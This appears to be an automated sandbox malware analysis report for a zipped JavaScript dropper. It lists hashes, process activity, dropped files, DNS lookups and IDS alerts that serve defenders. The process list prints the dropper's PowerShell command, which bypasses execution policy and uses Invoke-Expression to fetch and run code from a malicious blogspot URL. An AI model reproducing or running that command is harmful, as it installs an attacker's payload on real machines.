File name:

c99a68e57fab36054db049ca29b4a5b32ca6666e7bba18bb4c90aba8444ae6a5 (1).zip

Full analysis: https://app.any.run/tasks/ec7960a1-b9c5-4510-98e6-fa5b26353a2b
Verdict: Malicious activity
Analysis date: October 03, 2025, 16:47:48
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
arch-scr
Indicators:
MIME: application/zip
File info: Zip archive data, at least v5.1 to extract, compression method=AES Encrypted
MD5:

6E47AAAFFD63CF9CE8565E75903D3985

SHA1:

CA7FF19D1600C5DAC29FF6B43455DFD20674A287

SHA256:

325F1F606ED5F54B9E8092E4534CEA79442CE8DE51D8E9AD9712287BA63E25CE

SSDEEP:

768:ss00NJHZKTCBYTvW5NqjATSizm/MkHacuZrmQm:ss00nHZKTCkSNqEOiK5OmQm

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Generic archive extractor

      • WinRAR.exe (PID: 6416)
    • Changes powershell execution policy (Bypass)

      • wscript.exe (PID: 5932)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 3224)
    • Deletes a file (SCRIPT)

      • wscript.exe (PID: 5932)
  • SUSPICIOUS

    • Possibly malicious use of IEX has been detected

      • wscript.exe (PID: 5932)
    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 5932)
    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 5932)
    • Gets full path of the running script (SCRIPT)

      • wscript.exe (PID: 5932)
    • PowerShell delay command usage (probably sleep evasion)

      • powershell.exe (PID: 3224)
    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 3224)
    • Creates FileSystem object to access computer's file system (SCRIPT)

      • wscript.exe (PID: 5932)
    • Converts a string into array of characters (POWERSHELL)

      • powershell.exe (PID: 3224)
    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 3224)
  • INFO

    • Manual execution by a user

      • wscript.exe (PID: 5932)
    • Disables trace logs

      • powershell.exe (PID: 3224)
    • Checks proxy server information

      • powershell.exe (PID: 3224)
      • BackgroundTransferHost.exe (PID: 8432)
      • slui.exe (PID: 8392)
    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 3224)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 3224)
    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 3224)
    • Reads security settings of Internet Explorer

      • BackgroundTransferHost.exe (PID: 4076)
      • BackgroundTransferHost.exe (PID: 8432)
      • BackgroundTransferHost.exe (PID: 8612)
      • BackgroundTransferHost.exe (PID: 8840)
      • BackgroundTransferHost.exe (PID: 9052)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 3224)
    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 3224)
    • Creates files or folders in the user directory

      • BackgroundTransferHost.exe (PID: 8432)
    • Reads the software policy settings

      • slui.exe (PID: 8392)
      • BackgroundTransferHost.exe (PID: 8432)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 51
ZipBitFlag: 0x0003
ZipCompression: Unknown (99)
ZipModifyDate: 2025:10:03 16:47:26
ZipCRC: 0x4716119a
ZipCompressedSize: 22645
ZipUncompressedSize: 106661
ZipFileName: c99a68e57fab36054db049ca29b4a5b32ca6666e7bba18bb4c90aba8444ae6a5.js
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
178
Monitored processes
11
Malicious processes
1
Suspicious processes
1

Behavior graph

Click at the process to see the details

Process information

PID
CMD
Path
Indicators
Parent process
2428C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
2488\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3224"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-Expression (IrM https://potalgonabunbunsed.blogspot.com///////////i.pdf); Start-Sleep -Seconds 9C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
4294967295
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
4076"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1C:\Windows\System32\BackgroundTransferHost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Download/Upload Host
Exit code:
1
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\backgroundtransferhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\bcryptprimitives.dll
5932"C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\c99a68e57fab36054db049ca29b4a5b32ca6666e7bba18bb4c90aba8444ae6a5.js" C:\Windows\System32\wscript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
4294967295
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6416"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\c99a68e57fab36054db049ca29b4a5b32ca6666e7bba18bb4c90aba8444ae6a5 (1).zip"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
8392C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
8432"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1C:\Windows\System32\BackgroundTransferHost.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Download/Upload Host
Exit code:
1
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\backgroundtransferhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\bcryptprimitives.dll
8612"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1C:\Windows\System32\BackgroundTransferHost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Download/Upload Host
Exit code:
1
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\backgroundtransferhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\bcryptprimitives.dll
8840"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1C:\Windows\System32\BackgroundTransferHost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Download/Upload Host
Exit code:
1
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\backgroundtransferhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\bcryptprimitives.dll
Total events
20 345
Read events
20 308
Write events
37
Delete events
0

Modification events

(PID) Process:(6416) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\Interface\Themes
Operation:writeName:ShellExtBMP
Value:
(PID) Process:(6416) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\Interface\Themes
Operation:writeName:ShellExtIcon
Value:
(PID) Process:(6416) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:3
Value:
C:\Users\admin\Desktop\preferences.zip
(PID) Process:(6416) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:2
Value:
C:\Users\admin\Desktop\chromium_ext.zip
(PID) Process:(6416) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:1
Value:
C:\Users\admin\Desktop\omni_23_10_2024_.zip
(PID) Process:(6416) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\AppData\Local\Temp\c99a68e57fab36054db049ca29b4a5b32ca6666e7bba18bb4c90aba8444ae6a5 (1).zip
(PID) Process:(6416) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(6416) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(6416) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(6416) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:mtime
Value:
100
Executable files
0
Suspicious files
6
Text files
3
Unknown types
0

Dropped files

PID
Process
Filename
Type
8432BackgroundTransferHost.exeC:\Users\admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\c2f88db6-6da4-4c75-8fab-964a61ffdc1b.down_data
MD5:
SHA256:
8432BackgroundTransferHost.exeC:\Users\admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\Content\26C212D9399727259664BDFCA073966E_F9F7D6A7ECE73106D2A8C63168CDA10Dbinary
MD5:A2459D8C15651BB81784468BC907C939
SHA256:E6360479BE8038E7443DA1855F01EC552F1B602A656A2BF713C1CD760B7CB6C8
3224powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_1z2k5mwp.lo5.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6416WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRb6416.21556\c99a68e57fab36054db049ca29b4a5b32ca6666e7bba18bb4c90aba8444ae6a5.jstext
MD5:6DFA3FC4E6C7DFFCB5B40552D4171C14
SHA256:C99A68E57FAB36054DB049CA29B4A5B32CA6666E7BBA18BB4C90ABA8444AE6A5
3224powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ahhvyrq3.ok5.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
8432BackgroundTransferHost.exeC:\Users\admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\26C212D9399727259664BDFCA073966E_F9F7D6A7ECE73106D2A8C63168CDA10Dbinary
MD5:31324527BCEE7322E1A72FD780DD848A
SHA256:11E7455286AFCD861BF822B7E9D010BAD2239F2ABE0E926B9FB9A6295EE3A963
8432BackgroundTransferHost.exeC:\Users\admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\ff6defbb-0c3e-4da0-9376-70c2f0b6aec6.up_meta_securebinary
MD5:8F22CB9183CC26DE02FB123522207EAA
SHA256:F2AF4ADE5B6036598C12D0D1499CE43CB1741E8EB50F368C61B61A2F9BE66F27
8432BackgroundTransferHost.exeC:\Users\admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\c2f88db6-6da4-4c75-8fab-964a61ffdc1b.fab4976b-e98c-4076-b388-46746ed1825e.down_metabinary
MD5:DA9CA9A3DEB8F56412259DB94A3917A7
SHA256:9F12A87ECF825B1A86B9D1C5DE38A5E1DDD6F01DB559BBDF0F08CF21C7787353
3224powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCachebinary
MD5:33DE27C8DCC88FC3DB33B429DB60C7D5
SHA256:708AE655B44F33D7DCD06BC681E15BD4D8E9C37226D62D38FF8F51FF0EB714E3
8432BackgroundTransferHost.exeC:\Users\admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\ff6defbb-0c3e-4da0-9376-70c2f0b6aec6.fab4976b-e98c-4076-b388-46746ed1825e.down_metabinary
MD5:DA9CA9A3DEB8F56412259DB94A3917A7
SHA256:9F12A87ECF825B1A86B9D1C5DE38A5E1DDD6F01DB559BBDF0F08CF21C7787353
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
38
DNS requests
19
Threats
7

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2000
svchost.exe
GET
200
172.66.2.5:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
US
binary
471 b
whitelisted
2356
backgroundTaskHost.exe
GET
200
172.66.2.5:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D
US
binary
471 b
whitelisted
8432
BackgroundTransferHost.exe
GET
200
172.66.2.5:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
US
binary
313 b
whitelisted
1260
backgroundTaskHost.exe
GET
200
172.66.2.5:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D
US
binary
471 b
whitelisted
2000
svchost.exe
GET
200
172.66.2.5:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
US
binary
471 b
whitelisted
8100
backgroundTaskHost.exe
GET
200
172.66.2.5:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
US
binary
313 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
6016
MoUsoCoreWorker.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4384
RUXIMICS.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:138
whitelisted
5224
SearchApp.exe
95.101.136.194:443
www.bing.com
Akamai International B.V.
GB
whitelisted
2000
svchost.exe
40.126.31.71:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
2000
svchost.exe
172.66.2.5:80
ocsp.digicert.com
US
whitelisted
8100
backgroundTaskHost.exe
95.101.136.194:443
www.bing.com
Akamai International B.V.
GB
whitelisted
8100
backgroundTaskHost.exe
172.66.2.5:80
ocsp.digicert.com
US
whitelisted
3464
svchost.exe
172.211.123.248:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
  • 51.124.78.146
whitelisted
google.com
  • 142.250.181.238
whitelisted
www.bing.com
  • 95.101.136.194
  • 95.101.136.201
whitelisted
login.live.com
  • 40.126.31.71
  • 20.190.159.2
  • 40.126.31.128
  • 20.190.159.64
  • 40.126.31.131
  • 20.190.159.128
  • 40.126.31.2
  • 40.126.31.3
whitelisted
ocsp.digicert.com
  • 172.66.2.5
  • 162.159.142.9
whitelisted
client.wns.windows.com
  • 172.211.123.248
  • 172.211.123.249
whitelisted
arc.msn.com
  • 20.223.36.55
  • 20.86.201.138
whitelisted
fd.api.iris.microsoft.com
  • 20.223.35.26
whitelisted
potalgonabunbunsed.blogspot.com
  • 142.250.185.97
malicious
94fae730-597f-4442-813c-86263972a8f0.usrfiles.com
  • 18.66.192.71
  • 18.66.192.52
  • 18.66.192.79
  • 18.66.192.93
malicious

Threats

PID
Process
Class
Message
2428
svchost.exe
Misc activity
ET INFO Commonly Actor Abused Online Service Domain (usrfiles .com)
3224
powershell.exe
Misc activity
ET INFO Observed Commonly Actor Abused Online Service Domain (usrfiles .com in TLS SNI)
A Network Trojan was detected
ET MALWARE Observed Malicious Powershell Loader Payload Request (GET)
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
Misc activity
ET INFO Request for PDF via PowerShell
No debug info